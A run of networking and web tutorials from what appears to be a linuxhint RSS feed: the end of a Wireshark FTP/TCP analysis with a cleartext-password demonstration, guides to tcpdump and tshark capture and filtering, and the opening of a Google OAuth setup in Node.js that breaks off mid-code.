Wireshark displays detailed TCP information that matches the TCP packet segment. We highlight the TCP packet from the host computer to the ftp McAfee server to study the Transfer Control Protocol layer in the Packet detail panel. You can notice that the first TCP datagram for the ftp session initiation only sets SYN bit to 1.

The explanation for each field in the Transport Control Protocol layer in Wireshark is given below:

  • Source Port: 43854, it’s the TCP host that initiated a connection. It’s a number that lies anywhere above 1023.
  • Destination Port: 21, it’s a port number associated with ftp service. That means, FTP server listens on port 21 for client connection requests.
  • Sequence Number: It’s a 32-bit field that holds a number for the first byte sent in a particular segment. This number helps in the identification of the messages received in order.
  • Acknowledgment Number: A 32-bit field specifies an acknowledgment receiver expects to receive after successful transmission of previous bytes.
  • Control Flags: each code bit form has a special meaning in TCP session management that contributes to each packet segment’s treatment.

ACK: validates acknowledgment number of a receipt segment.

SYN: synchronize sequence number, which is set at the initiation of a new TCP session

FIN: request for session termination

URG: requests by the sender to send urgent data

RST: request for resetting the session

PSH: request for push

  • Window size: it’s the sliding window’s value that tells the size of sent TCP bytes.
  • Checksum: field that holds checksum for error control. This field is mandatory in TCP in contrast to UDP.

Moving toward the second TCP datagram captured in the Wireshark filter. The McAfee server acknowledges the SYN request. You can notice the values of SYN and ACK bits set to 1.

In the last packet, you can notice that the host sends an acknowledgment to the server for FTP session initiation. You can notice that the Sequence number and the ACK bits are set to 1.

After establishing a TCP session, the FTP client and server exchange some traffic, the FTP client acknowledges the FTP server Response 220 packet sent via TCP session through a TCP session. Hence, all the information exchange is carried out via TCP session at FTP client and FTP server.

After the FTP session completion, the ftp client sends the termination message to the server. After request acknowledgment, the TCP session at the server sends a termination announcement to the client’s TCP session. In response, the TCP session at the client acknowledges the termination datagram and sends its own termination session. After receipt of the termination session, the FTP server sends an acknowledgment of the termination, and the session is closed.

Warning

FTP does not use encryption, and the login and password credentials are visible in broad daylight. Hence, as long as no one is eavesdropping and you are transferring sensitive files within your network, it’s safe. But do not use this protocol to access content from the internet. Use SFTP that uses secure shell SSH for file transfer.

FTP Password Capture

We will now show why it’s important not to use FTP over the internet. We will look for the specific phrases in the captured traffic containing user, username, password, etc., as instructed below.

Go to Edit-> “Find Packet” and choose String for the Display Filter, and then select Packet bytes to show searched data in cleartext.

Type in the string pass in the filter, and click Find. You will find the packet with the string “Please specify the password” in the Packet bytes panel. You can also notice the highlighted packet in the Packet list panel.

Open this packet in a separate Wireshark window by right-clicking on the packet and select Follow->TCP stream.

Now search again, and you will find the password in plain text in the Packet byte panel. Open the highlighted packet in a separate window as above. You will find the user credentials in plaintext.

Conclusion

This article has learned how FTP works, analyzed how TCP controls and manages operations in an FTP session, and understood why it’s important to use secure shell protocols for file transfer over the internet. Coming up in future articles, we will cover some of the command-line interfaces for Wireshark.

 

]]>
A Guide to Network Traffic Analysis Utility: TCPDUMP https://linuxhint.com/tcpdump-beginner-guide/ Wed, 10 Feb 2021 07:21:21 +0000 https://linuxhint.com/?p=89439

Tcpdump is a network packet sniffing command-line utility. It is most commonly used for troubleshooting networks and testing security issues. Despite the absence of a graphical user interface, it’s the most popular, powerful, and versatile command-line utility.

It is native to Linux such that most of the Linux distributions install it as a part of the standard OS. Tcpdump is a libpcap interfaced program, which is a library for network datagram capture.

This article will demystify tcpdump by showing how to capture, read, and analyze captured network traffic in this utility. We will later use our understanding to inspect data packets with the advanced TCP flag filters.

Tcpdump Installation

Tcpdump default installation in your distro depends on the options selected during the installation process. In the case of custom installation, it’s possible that the package is not available. You can check tcpdump installation by using the dpkg command with the “-s” option.

ubuntu$ubuntu:~$ dpkg -s tcpdump

Or use the command “sudo apt-get install tcpdump” to install tcpdump in the Ubuntu Linux.

Capturing Packets in Tcpdump:

To begin the capture process, we first need to find our working interface using the “ifconfig” command. Or we can list all the available interfaces using the tcpdump command with the “-D” option.

ubuntu$ubuntu:~$ tcpdump -D

To begin the capture process, you can use the syntax;

tcpdump [-options] [expression]

For instance, in the command below, we use the “-i” option to capture traffic on the “enp0s3” interface, with a “-c” flag to limit the captured packets and write “-w” it to a test_capture.pcap file.

ubuntu$ubuntu:~$ sudo tcpdump -i enp0s3 -c 20 -w /tmp/test_capture.pcap

Similarly, you can use various filter combinations to isolate traffic as per your requirement. One such example includes capturing network data leaving and arriving at the host using the host command for a specific port. Moreover, I have used the “-n” flag to prevent tcpdump from capturing DNS lookups. This flag is very helpful in saturating traffic while troubleshooting the network.

ubuntu$ubuntu:~$ sudo tcpdump -i enp0s3 -c 20 host 10.0.2.15 and dst port 80 -w /tmp/test_capture1.pcap

tcpdump: listening on enp0s3, link-type EN10MB (Ethernet), capture size 262144 bytes

20 packets captured

21 packets received by filter

0 packets dropped by kernel

We use the “and” command to only capture packets containing host 10.0.2.15 and destination port 80. Similarly, various other filters can be applied to ease troubleshooting tasks.

If you do not want to use the “-c” flag to limit capture traffic, you can use an interrupt signal, i.e., Ctrl+C, to stop the isolation process.

Reading Tcpdump Files

Reading tcpdump captured files can be a lot overwhelming. By default, tcp assigns names to IP addresses and ports. We will use the “-r” flag to read our already captured file test_capture.pcap saved in the /tmp folder. We will pipe the output to awk command to only output the source IP address and ports and pipe it to the command head to only display the first 5 entries.

ubuntu$ubuntu:~$ sudo tcpdump -r /tmp/test_capture1.pcap | awk -F “ ” ‘print{$3}| head -5

reading from file /tmp/test_capture.pcap, link-type EN10MB (Ethernet)

IP ubuntu.53298

IP ubuntu.53298

IP ubuntu.53298

IP ubuntu.53298

IP ubuntu.53298

However, it is recommended to use IP addresses and ports in numbers to resolve networking issues. We will disable IP name resolution with the “-n” flag and port names with “-nn“.

ubuntu$ubuntu:~$ sudo tcpdump -i enp0s3 -n

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

listening on enp0s3, link-type EN10MB (Ethernet), capture size 262144 bytes

20:08:22.146354 IP 10.0.2.15.54080 > 172.67.39.148.443: Flags [P.], seq 1276027591:1276027630, ack 544039114, win 63900, length 39

20:08:22.146745 IP 10.0.2.15.43456 > 54.204.39.132.443: Flags [P.], seq 3381018839:3381018885, ack 543136109, win 65535, length 46

20:08:22.147506 IP 172.67.39.148.443 > 10.0.2.15.54080: Flags [.], ack 39, win 65535, length 0

20:08:22.147510 IP 54.204.39.132.443 > 10.0.2.15.43456: Flags [.], ack 46, win 65535, length 0

20:08:22.202346 IP 216.58.209.142.443 > 10.0.2.15.41050: Flags [P.], seq 502925703:502925826, ack 1203118935, win 65535, length 123

20:08:22.202868 IP 10.0.2.15.41050 > 216.58.209.142.443: Flags [P.], seq 1:40, ack 123, win 65535, length 39

Understanding Captured Output

Tcpdump captures many protocols, including UDP, TCP, ICMP, etc. It isn’t easy to cover all of them here. However, it’s important to understand how the information is displayed and what parameters it includes.

Tcpdump displays each packet in a line, with a timestamp and information with respect to the protocol. Generally, the format of a TCP protocol is as follows:

<timestamp> <protocol> <src ip>.<src port> > <dst ip>.<dst port>: <flags>, <seq>, <ack>, <win size>, <options>, <data length>

Let’s explain one of the captured packet fields by field:

20:08:22.146354 IP 10.0.2.15.54080 > 172.67.39.148.443: Flags [P.], seq 1276027591:1276027630, ack 544039114, win 63900, length 39
  • 20:08:22.146354: Timestamp of the captured packet
  • IP: Network layer protocol.
  • 10.0.2.15.54080: This field contains the source IP address and source port.
  • 172.67.39.148.443: This field represents the destination IP address and port number.
  • Flags[P.]/<flags>: The flags represent the connection state. In this case, [P.] indicates the PUSH acknowledgment packet. The flag field also includes some other values like:
    1. S: SYN
    2. P: PUSH
    3. [.]: ACK
    4. F: FIN
    5. [S.]: SYN_ACK
    6. R: RST
  • seq 1276027591:1276027630: The sequence number in the first: the last format denotes the number of data in the packet. Excluding the first packet where the numbers are in absolute, the subsequent packets have relative numbers. In this case, the numbers here mean that the packet contains data bytes from  1276027591 to 1276027630.
  • ack 544039114: The acknowledgment number depicts the next expected data sequence number.
  • win 63900: The window size depicts the number of available bytes in the received buffer.
  • length 39: Length of payload data, in bytes.

Advanced Filters

Now we can use some advanced heading filter options to display and analyze only data packets. In any TCP packet, the TCP flags begin from the 14th byte such that  PSH and ACK are represented by 4th and 5th bits.

We can use this information by turning on these bits 00011000 or 24 to display data packets with only PSH and ACK flags. We pass this number to tcpdump with the filter “tcp[13]=24“, note that the array index in TCP begins at zero.

We will filter out this packet from our text_capture.pcap file and use the -A option to display all the packet details for you.

Similarly, you can filter out some other flag packets using “tcp[13]=8” and “tcp[13]=2” for only PSH and SYN flags, etc.

ubuntu$ubuntu:~$ sudo tcpdump -A 'tcp[13]=24' -r /tmp/test_capture.pcap

reading from file /tmp/test_capture.pcap, link-type EN10MB (Ethernet)

19:26:17.827902 IP ubuntu.53298 > 32.121.122.34.bc.googleusercontent.com.http: Flags [P.], seq 4286571276:4286571363, ack 252096002, win 64240, length 87: HTTP: GET / HTTP/1.1

E...:?@.@.X.

..."zy .2.P........P.......GET / HTTP/1.1

Host: connectivity-check.ubuntu.com

Accept: */*

Connection: close

Conclusion

In this article, we have introduced you to some of the most important topics of tcpdump. Tcpdump, combined with the power of CLI, can be of great help in network troubleshooting, automation, and security management. Once studied and combined, its filters and command line options can contribute a lot to your day-to-day troubleshooting and automation tasks and overall understanding of the network.

]]>
A Guide to the Wireshark Command Line Interface “tshark” https://linuxhint.com/wireshark-command-line-interface-tshark/ Sun, 07 Feb 2021 18:25:21 +0000 https://linuxhint.com/?p=89289 In the earlier tutorials for Wireshark, we have covered fundamental to advanced level topics. In this article, we will understand and cover a command-line interface for Wireshark, i.e., tshark. The terminal version of Wireshark supports similar options and is a lot useful when a Graphical User Interface (GUI) isn’t available.

Even though a graphical user interface is, theoretically, a lot easier to use, not all environments support it, especially server environments with only command-line options. Hence, at some point in time, as a network administrator or a security engineer, you will have to use a command-line interface. Important to note that tshark is sometimes used as a substitute for tcpdump. Even though both tools are almost equivalent in traffic capturing functionality, tshark is a lot more powerful.

The best you can do is to use tshark to set up a port in your server that forwards information to your system, so you can capture traffic for analysis using a GUI. However, for the time being, we will learn how it works, what are its attributes, and how you can utilize it to the best of its capabilities.

Type the following command to install tshark in Ubuntu/Debian using apt-get:

ubuntu@ubuntu:~$ sudo apt-get install tshark -y

Now type tshark –help to list out all the possible arguments with their respective flags that we can pass to a command tshark.

ubuntu@ubuntu:~$ tshark --help | head -20

TShark (Wireshark) 2.6.10 (Git v2.6.10 packaged as 2.6.10-1~ubuntu18.04.0)

Dump and analyze network traffic.

See https://www.wireshark.org for more information.

Usage: tshark [options] ...

Capture interface:

-i <interface> name or idx of interface (def: first non-loopback)

-f <capture filter> packet filter in libpcap filter syntax

-s <snaplen> packet snapshot length (def: appropriate maximum)

-p don't capture in promiscuous mode

-I capture in monitor mode, if available

-B <buffer size> size of kernel buffer (def: 2MB)

-y <link type> link layer type (def: first appropriate)

--time-stamp-type <type> timestamp method for interface

-D print list of interfaces and exit

-L print list of link-layer types of iface and exit

--list-time-stamp-types print list of timestamp types for iface and exit

Capture stop conditions:

You can notice a list of all available options. In this article, we will cover most of the arguments in detail, and you will understand the power of this terminal oriented Wireshark version.

Selecting Network Interface:

To conduct live capture and analysis in this utility, we first need to figure out our working interface. Type tshark -D and tshark will list all the available interfaces.

ubuntu@ubuntu:~$ tshark -D

1. enp0s3

2. any

3. lo (Loopback)

4. nflog

5. nfqueue

6. usbmon1

7. ciscodump (Cisco remote capture)

8. randpkt (Random packet generator)

9. sshdump (SSH remote capture)

10. udpdump (UDP Listener remote capture)

Note that not all the listed interfaces will be working. Type ifconfig to find working interfaces on your system. In my case, it’s enp0s3.

Capture Traffic:

To start the live capture process, we will use the tshark command with the “-i” option to begin the capture process from the working interface.

ubuntu@ubuntu:~$ tshark -i enp0s3

Use Ctrl+C to stop the live capture. In the above command, I have piped the captured traffic to the Linux command head to display the first few captured packets. Or you can also use the “-c <n>” syntax to capture the “n” number of packets.

ubuntu@ubuntu:~$ tshark -i enp0s3 -c 5

If you only enter tshark, by default, it will not start capturing traffic on all available interfaces nor will it listen to your working interface. Instead, it will capture packets on the first listed interface.

You can also use the following command to check on multiple interfaces:

ubuntu@ubuntu:~$ tshark -i enp0s3 -i usbmon1 -i lo

In the meantime, another way to live capture traffic is to use the number alongside the listed interfaces.

ubuntu@ubuntu:~$ tshark -i interface_number

However, in the presence of multiple interfaces, it’s hard to keep track of their listed numbers.

Capture Filter:

Capture filters significantly reduce the captured file size. Tshark uses Berkeley Packet Filter syntax -f<filter>”, which is also used by tcpdump. We will use the “-f” option to only capture packets from ports 80 or 53 and use “-c” to display only the first 10 packets.

ubuntu@ubuntu:~$ tshark -i enp0s3 -f "port 80 or port 53" -c 10

Saving Captured Traffic to a File:

The key thing to note in the above screenshot is that the information displayed isn’t saved, hence it’s less useful. We use the argument “-w” to save the captured network traffic to test_capture.pcap in /tmp folder.

ubuntu@ubuntu:~$ tshark -i enp0s3 -w /tmp/test_capture.pcap

Whereas, .pcap is the Wireshark file type extension. By saving the file, you can review and analyze the traffic in a machine with Wireshark GUI later.

It’s a good practice to save the file in /tmp as this folder doesn’t require any execution privileges. If you save it to another folder, even if you are running tshark with root privileges, the program will deny permission due to security reasons.

Let’s dig into all the possible ways through which you can:

  • apply limits to capturing data, such that exiting tshark or auto-stopping the capture process, and
  • output your files.

Autostop Parameter:

You can use the “-a” parameter to incorporate available flags such as duration file size and files. In the following command, we use the autostop parameter with the duration flag to stop the process within 120 seconds.

ubuntu@ubuntu:~$ tshark -i enp0s3 -a duration:120 -w /tmp/test_capture.pcap

Similarly, if you don’t need your files to be extra-large, filesize is a perfect flag to stop the process after some KB’s limits.

ubuntu@ubuntu:~$ tshark -i enp0s3 -a filesize:50 -w /tmp/test_capture.pcap

Most importantly, files flag allows you to stop the capture process after a number of files. But this can only be possible after creating multiple files, which requires the execution of another useful parameter, capture output.

Capture Output Parameter:

Capture output, aka ringbuffer argument “-b“, comes along with the same flags as autostop. However, the usage/output is a bit different, i.e., the flags duration and filesize, as it allows you to switch or save packets to another file after reaching a specified time limit in seconds or file size.

The below-command shows that we capture the traffic through our network interface enp0s3, and capture traffic using the capture filter “-f” for tcp and dns. We use ringbuffer option “-b” with a filesize flag to save each file of size 15 Kb, and also use the autostop argument to specify the number of files using files option such that it stops the capture process after generating three files.

ubuntu@ubuntu:~$ tshark -i enp0s3 -f "port 53 or port 21" -b filesize:15 -a files:2 -w /tmp/test_capture.pcap

I have split my terminal into two screens to actively monitor the creation of three .pcap files.

Go to your /tmp folder and use the following command in the second terminal to monitor updates after every one second.

ubuntu@ubuntu:~$ watch -n 1 "ls -lt"

Now, you do not need to memorize all these flags. Instead, type a command tshark -i enp0s3 -f “port 53 or port 21” -b filesize:15 -a in your terminal and press Tab. The list of all available flags will be available on your screen.

ubuntu@ubuntu:~$ tshark -i enp0s3 -f "port 53 or port 21" -b filesize:15 -a
duration: files: filesize:
ubuntu@ubuntu:~$ tshark -i enp0s3 -f "port 53 or port 21" -b filesize:15 -a

Reading .pcap Files:

Most importantly, you can use a “-r” parameter to read the test_capture.pcap files and pipe it to the head command.

ubuntu@ubuntu:~$ tshark -r /tmp/test_capture.pcap | head

The information displayed in the output file can be a bit overwhelming. To avoid unnecessary details and get a better understanding of any specific destination IP address, we use the -r option to read the packet captured file and use an ip.addr filter to redirect the output to a new file with the “-w” option. This will allow us to review the file and refine our analysis by applying further filters.

ubuntu@ubuntu:~$ tshark -r /tmp/test_capture.pcap -w /tmp/redirected_file.pcap ip.dst==216.58.209.142
ubuntu@ubuntu:~$ tshark -r /tmp/redirected_file.pcap|head
1 0.000000000 10.0.2.15 → 216.58.209.142 TLSv1.2 370 Application Data
2 0.000168147 10.0.2.15 → 216.58.209.142 TLSv1.2 669 Application Data
3 0.011336222 10.0.2.15 → 216.58.209.142 TLSv1.2 5786 Application Data
4 0.016413181 10.0.2.15 → 216.58.209.142 TLSv1.2 1093 Application Data
5 0.016571741 10.0.2.15 → 216.58.209.142 TLSv1.2 403 Application Data
6 0.016658088 10.0.2.15 → 216.58.209.142 TCP 7354 [TCP segment of a reassembled PDU]
7 0.016738530 10.0.2.15 → 216.58.209.142 TLSv1.2 948 Application Data
8 0.023006863 10.0.2.15 → 216.58.209.142 TLSv1.2 233 Application Data
9 0.023152548 10.0.2.15 → 216.58.209.142 TLSv1.2 669 Application Data
10 0.023324835 10.0.2.15 → 216.58.209.142 TLSv1.2 3582 Application Data

Selecting Fields to Output:

The commands above output a summary of each packet that includes various header fields. Tshark also allows you to view specified fields. To specify a field, we use “-T field” and extract fields as per our choice.

After the “-T field” switch, we use the “-e” option to print the specified fields/filters. Here, we can use Wireshark Display Filters.

ubuntu@ubuntu:~$ tshark -r /tmp/test_capture.pcap -T fields -e frame.number -e ip.src -e ip.dst | head

1 10.0.2.15 216.58.209.142
2 10.0.2.15 216.58.209.142
3 216.58.209.142 10.0.2.15
4 216.58.209.142 10.0.2.15
5 10.0.2.15 216.58.209.142
6 216.58.209.142 10.0.2.15
7 216.58.209.142 10.0.2.15
8 216.58.209.142 10.0.2.15
9 216.58.209.142 10.0.2.15
10 10.0.2.15 115.186.188.3

Capture Encrypted Handshake Data:

So far, we have learned to save and read output files using various parameters and filters. We will now learn how HTTPS initializes session tshark. The websites accessed via HTTPS instead of HTTP ensures a secure or encrypted data transmission over the wire. For secure transmission, a Transport Layer Security encryption starts a handshake process to kick off communication between the client and the server.

Let’s capture and understand the TLS handshake using tshark. Split your terminal into two screens and use a wget command to retrieve an html file from https://www.wireshark.org.

ubuntu@ubuntu:~$ wget https://www.wireshark.org
--2021-01-09 18:45:14-- https://www.wireshark.org/
Connecting to www.wireshark.org (www.wireshark.org)|104.26.10.240|:443... connected.
HTTP request sent, awaiting response... 206 Partial Content
Length: 46892 (46K), 33272 (32K) remaining [text/html]
Saving to: ‘index.html’
index.html 100%[++++++++++++++==================================>] 45.79K 154KB/s in 0.2s
2021-01-09 18:43:27 (154 KB/s) - ‘index.html’ saved [46892/46892]

In another screen, we will use tshark to capture the first 11 packets by using the “-c” parameter. While performing analysis, timestamps are important to reconstruct events, hence we use “-t ad”, in a way that tshark adds timestamp alongside each captured packet. Lastly, we use the host command to capture packets from the shared host ip address.

This handshake is quite similar to the TCP handshake. As soon as the TCP three-way handshake concludes in the first three packets, the fourth to ninth packets follow a somewhat similar handshake ritual and include TLS strings to ensure encrypted communication between both parties.

ubuntu@ubuntu:~$ tshark -i enp0s3 -c 11 -t ad host 104.26.10.240
Capturing on 'enp0s3'
1 2021-01-09 18:45:14.174524575 10.0.2.15 → 104.26.10.240 TCP 74 48512443 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM=1 TSval=2488996311 TSecr=0 WS=128
2 2021-01-09 18:45:14.279972105 104.26.10.240 → 10.0.2.15 TCP 60 44348512 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460
3 2021-01-09 18:45:14.280020681 10.0.2.15 → 104.26.10.240 TCP 54 48512443 [ACK] Seq=1 Ack=1 Win=64240 Len=0
4 2021-01-09 18:45:14.280593287 10.0.2.15 → 104.26.10.240 TLSv1 373 Client Hello
5 2021-01-09 18:45:14.281007512 104.26.10.240 → 10.0.2.15 TCP 60 44348512 [ACK] Seq=1 Ack=320 Win=65535 Len=0
6 2021-01-09 18:45:14.390272461 104.26.10.240 → 10.0.2.15 TLSv1.3 1466 Server Hello, Change Cipher Spec
7 2021-01-09 18:45:14.390303914 10.0.2.15 → 104.26.10.240 TCP 54 48512443 [ACK] Seq=320 Ack=1413 Win=63540 Len=0
8 2021-01-09 18:45:14.392680614 104.26.10.240 → 10.0.2.15 TLSv1.3 1160 Application Data
9 2021-01-09 18:45:14.392703439 10.0.2.15 → 104.26.10.240 TCP 54 48512443 [ACK] Seq=320 Ack=2519 Win=63540 Len=0
10 2021-01-09 18:45:14.394218934 10.0.2.15 → 104.26.10.240 TLSv1.3 134 Change Cipher Spec, Application Data
11 2021-01-09 18:45:14.394614735 104.26.10.240 → 10.0.2.15 TCP 60 44348512 [ACK] Seq=2519 Ack=400 Win=65535 Len=0
11 packets captured

Viewing Entire Packet:

The only disadvantage of a command-line utility is that it doesn’t have a GUI, as it becomes very handy when you need to search a lot of internet traffic, and it also offers a Packet Panel that displays all the packet details within an instant. However, it’s still possible to inspect the packet and dump the entire packet information displayed in GUI Packet Panel.

To inspect an entire packet, we use a ping command with the “-c” option to capture a single packet.

ubuntu@ubuntu:~$ ping -c 1 104.26.10.240
PING 104.26.10.240 (104.26.10.240) 56(84) bytes of data.
64 bytes from 104.26.10.240: icmp_seq=1 ttl=55 time=105 ms
--- 104.26.10.240 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 105.095/105.095/105.095/0.000 ms

In another window, use the tshark command with an additional flag to display the entire packet details. You can notice various sections, displaying Frames, Ethernet II, IPV, and ICMP details.

ubuntu@ubuntu:~$ tshark -i enp0s3 -c 1 -V host 104.26.10.240
Frame 1: 98 bytes on wire (784 bits), 98 bytes captured (784 bits) on interface 0
Interface id: 0 (enp0s3)
Interface name: enp0s3
Encapsulation type: Ethernet (1)
Arrival Time: Jan 9, 2021 21:23:39.167581606 PKT
[Time shift for this packet: 0.000000000 seconds]
Epoch Time: 1610209419.167581606 seconds
[Time delta from previous captured frame: 0.000000000 seconds]
[Time delta from previous displayed frame: 0.000000000 seconds]
[Time since reference or first frame: 0.000000000 seconds]
Frame Number: 1
Frame Length: 98 bytes (784 bits)
Capture Length: 98 bytes (784 bits)
[Frame is marked: False]
[Frame is ignored: False]
[Protocols in frame: eth:ethertype:ip:icmp:data]
Ethernet II, Src: PcsCompu_17:fc:a6 (08:00:27:17:fc:a6), Dst: RealtekU_12:35:02 (52:54:00:12:35:02)
Destination: RealtekU_12:35:02 (52:54:00:12:35:02)
Address: RealtekU_12:35:02 (52:54:00:12:35:02)
.... ..1. .... .... .... .... = LG bit: Locally administered address (this is NOT the factory default)
.... ...0 .... .... .... .... = IG bit: Individual address (unicast)
Source: PcsCompu_17:fc:a6 (08:00:27:17:fc:a6)
Address: PcsCompu_17:fc:a6 (08:00:27:17:fc:a6)
Interface id: 0 (enp0s3)
Interface name: enp0s3
Encapsulation type: Ethernet (1)
Arrival Time: Jan 9, 2021 21:23:39.167581606 PKT
[Time shift for this packet: 0.000000000 seconds]
Epoch Time: 1610209419.167581606 seconds
[Time delta from previous captured frame: 0.000000000 seconds]
[Time delta from previous displayed frame: 0.000000000 seconds]
[Time since reference or first frame: 0.000000000 seconds]
Frame Number: 1
Frame Length: 98 bytes (784 bits)
Capture Length: 98 bytes (784 bits)
[Frame is marked: False]
[Frame is ignored: False]
[Protocols in frame: eth:ethertype:ip:icmp:data]
Ethernet II, Src: PcsCompu_17:fc:a6 (08:00:27:17:fc:a6), Dst: RealtekU_12:35:02 (52:54:00:12:35:02)
Destination: RealtekU_12:35:02 (52:54:00:12:35:02)
Address: RealtekU_12:35:02 (52:54:00:12:35:02)
.... ..1. .... .... .... .... = LG bit: Locally administered address (this is NOT the factory default)
.... ...0 .... .... .... .... = IG bit: Individual address (unicast)
Source: PcsCompu_17:fc:a6 (08:00:27:17:fc:a6)
Address: PcsCompu_17:fc:a6 (08:00:27:17:fc:a6)
.... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
.... ...0 .... .... .... .... = IG bit: Individual address (unicast)
Type: IPv4 (0x0800)
Internet Protocol Version 4, Src: 10.0.2.15, Dst: 104.26.10.240
0100 .... = Version: 4
.... 0101 = Header Length: 20 bytes (5)
Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
0000 00.. = Differentiated Services Codepoint: Default (0)
.... ..00 = Explicit Congestion Notification: Not ECN-Capable Transport (0)
Total Length: 84
Identification: 0xcc96 (52374)
Flags: 0x4000, Don't fragment
0... .... .... .... = Reserved bit: Not set
.1.. .... .... .... = Don'
t fragment: Set
..0. .... .... .... = More fragments: Not set
...0 0000 0000 0000 = Fragment offset: 0
Time to live: 64

Protocol: ICMP (1)
Header checksum: 0xeef9 [validation disabled]
[Header checksum status: Unverified]
Source: 10.0.2.15
Destination: 104.26.10.240
Internet Control Message Protocol
Type: 8 (Echo (ping) request)
Code: 0
Checksum: 0x0cb7 [correct]
[Checksum Status: Good]
Identifier (BE): 5038 (0x13ae)
Identifier (LE): 44563 (0xae13)
Sequence number (BE): 1 (0x0001)
Sequence number (LE): 256 (0x0100)
Timestamp from icmp data: Jan 9, 2021 21:23:39.000000000 PKT
[Timestamp from icmp data (relative): 0.167581606 seconds]
Data (48 bytes)
0000 91 8e 02 00 00 00 00 00 10 11 12 13 14 15 16 17 ................
0010 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 ........ !"#$%&'
0020 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 ()*+,-./01234567
Data: 918e020000000000101112131415161718191a1b1c1d1e1f...
[Length: 48]

Conclusion:

The most challenging aspect of packet analysis is finding the most relevant information and ignoring the useless bits. Even though graphical interfaces are easy, they cannot contribute to automated network packet analysis. In this article, you have learned the most useful tshark parameters for capturing, displaying, saving, and reading network traffic files.

Tshark is a very handy utility that reads and writes the capture files supported by Wireshark. The combination of display and capture filters contributes a lot while working on advanced level use cases. We can leverage tshark ability to print fields and manipulate data as per our requirements for in-depth analysis. In other words, it’s capable of doing virtually everything that Wireshark does. Most importantly, it’s perfect for packet sniffing remotely using ssh, which is a topic for another day.

]]>
How to Authorize Users Using Google OAuth in Node.js https://linuxhint.com/authorize-users-using-google-oauth/ Tue, 02 Feb 2021 19:17:38 +0000 https://linuxhint.com/?p=88770

Open Authorization, also known as OAuth, is a protocol used to authorize a user on your website using some third-party service like Google, Github, Facebook, etc. The third-party service shares some data (name, email, profile picture, etc.) with your website and then authorizes the user on its behalf without managing the passwords and usernames for your website, and saving the users a lot of extra trouble.

How OAuth Works

When a user clicks on “Login with Google”, it takes the user to the Google OAuth consent page. When the user agrees to the consent and authenticates his identity on Google, Google will contact your website as a third party service and authorize the user on its behalf and share some data with your website. In this way, the user can be authorized without managing the credentials for your website separately.

Implementing Google OAuth using Node.js

Almost all the programming languages provide different libraries to implement google oauth to authorize users. Node.js provides ‘passport’ and ‘passport-google-oauth20’ libraries to implement google oauth. In this article, we will implement an oauth protocol to authorize users to use node.js.

Create a Project on Google

The first step to implement Google OAuth is to create a project on the google developer console for your website. This project is used to get the API keys used to make requests to Google for open authentication. Goto the following link and create your project.

https://console.developers.google.com

Configuring Google Project

After you create the project, go into the project and select “OAuth consent screen” from the left side menu.

Click on the ‘create’ button and provide all the details of your project. Click “Save and Continue” to move on.

Now provide the scope of your project. Scopes are the types of permissions to access the user’s data from a google account. You need to set up the permissions to get specific user data from your google account. Click “Save and Continue.”

Now add the test users to the project if you want. Test users are the only allowed users who can access your web application in Testing mode. For now, we will not enter any test user and click “Save and Continue” to move on to the summary page of the project.

Review your project on the summary page and save the configuration. Now we will generate credentials for our project. Select the ‘Credentials’ tab on the left side menu and click on the ‘Create credentials’ button on top to generate OAuth 2.0 Client IDs.

From the dropdown menu, select ‘OAuth client ID’ and specify the type of application as ‘Web application’ and your application’s name.

On the same page, we have to provide two URIs, the ‘Authorized Javascript Origins’ and the ‘Authorized redirect URIs’. The ‘Authorized javascript origins’ is the HTTP origin of your web application, and it can not have any path. The ‘Authorized redirect URIs’ is the exact URI with a path where the user will be redirected after google authentication.

After entering all the required entries, click on ‘create’ to create OAuth credentials.

Initiating Node.js Project

So far, we have created a google project to authorize users for our application using google. Now we are going to initiate the node.js project to implement oauth. Create a directory named ‘auth’ and initiate the express project.

ubuntu@ubuntu:~$ mkdir auth

ubuntu@ubuntu:~$ cd auth

ubuntu@ubuntu:~$ npm init -y

Installing Required npm Packages

To implement Google OAuth using node.js, we need to install some npm packages. We will use ‘passport’, ‘express’, ‘path’, and ‘passport-google-oauth20’. Install these packages using npm.

ubuntu@ubuntu:~$ npm install express passport passport-google-oauth20 path

Writing Node.js Code

First of all, we will write two simple html web pages, the one with a button, and authorize the user when clicked on the button. The second page will be authorized, and the user will be redirected to the authorized page after authorization. Create a file ‘public/index.html’.

<html>

  <head>

    <title>OAuth</title>

  </head>

  <body>

    <a href=/google/auth”>Authorize Here</a>

  </body>

</html>

Now create a file ‘public/success.html’ with the following content.

<html>

  <head>

    <title>OAuth</title>

  </head>

  <body>

    <h1>Authorized</h1>

  </body>

</html>

After creating web pages, now we will write code to authorize the users to use google oauth. Create a file ‘index.js’.

// importing required packages


const express = require(‘express’);

const passport = require(‘passport’);

const path = require(‘path’);

const GoogleStrategy = require(‘passport-google-oauth20’).Strategy;


const app = express();


// defining parameters


// client id is the parameter that we will get from the google developer console

CLIENT_ID=”xxxxxxx”;


// client secret will also be taken from the google developer console

CLIENT_SECRET=”xxxxx”;


// user will be redirected to the CALLBACK_URL after authorization

CALLBACK_URL=”http://localhost:8000/authorized”;


// port number must be the same as defined in the developer console

PORT=8000;


// configuring passport middleware


app.use(passport.initialize());

app.use(passport.session());


passport.serializeUser( function(id, done) {

  done(null, id);

});


passport.deserializeUser( function(id, done) {

  done(null, id);

});


// following middleware will run whenever passport. Authenticate method is called and returns different parameters defined in the scope.


passport.use(new GoogleStrategy({

  clientID: CLIENT_ID,

  clientSecret: CLIENT_SECRET,

  callbackURL: CALLBACK_URL

  },

  async function(accessToken, refreshToken, profile, email, cb) {

    return cb(null, email.id);

  }

));




// serving home page for the application

app.get(/’, (req, res) =>

{

  res.sendFile(path.join(__dirname + ‘/public/index.html’));

});


// serving success page for the application

app.get(/success’, (req, res) =>

{

  res.sendFile(path.join(__dirname + ‘/public/success.html’));

});


// user will be redirected to the google auth page whenever hits the ‘/google/auth’ route.


app.get(/google/auth’,

  passport.authenticate(‘google’, {scope: [‘profile’, ‘email’]})

);


// authentication failure redirection is defined in the following route


app.get(/authorized’,

